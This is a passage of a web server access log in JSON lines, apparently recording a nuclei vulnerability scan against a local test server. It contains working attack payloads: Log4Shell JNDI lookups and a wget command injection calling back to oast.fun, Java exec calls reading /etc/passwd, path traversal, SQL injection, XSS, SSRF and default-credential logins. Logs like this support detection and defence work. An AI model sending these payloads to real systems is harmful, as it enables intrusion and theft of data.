"13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c9v8h8gsmpv8c1qg07h09o18pgpw5anr5.oast.fun/a%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"cmd=login&user=admin&passwd=21232f297a57a5a743894a0e4a801fc3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://c9v8h8gsmpv8c1qg07h0odzsq9fta95zk.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat+%2Fetc%2Fpasswd')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type+C%3A%2FWindows%2Fwin.ini')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.170","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.176","http_user_agent":"${jndi:ldap://${hostName}.useragent.c9v8h88smpv8c1ig07h0gps1if4mtkkj3.oast.fun}", "http_referer":"${jndi:ldap://${hostName}.referer.c9v8h88smpv8c1ig07h0ftm5fq4zsmcde.oast.fun}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://${hostName}.xforwardedfor.c9v8h88smpv8c1ig07h0iumwki1kpxa63.oast.fun}"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-----------------------------253855577425106594691130420583\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22../../../../../tmp/passwd9\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0AMyPasswdNewData->/api/tomcat\x0D\x0A\x0D\x0A-----------------------------253855577425106594691130420583--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/cgi-bin/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"&uid=10; wget http://c9v8h8gsmpv8c1qg07h0zp1tgjiqgy6i4.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios4/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", 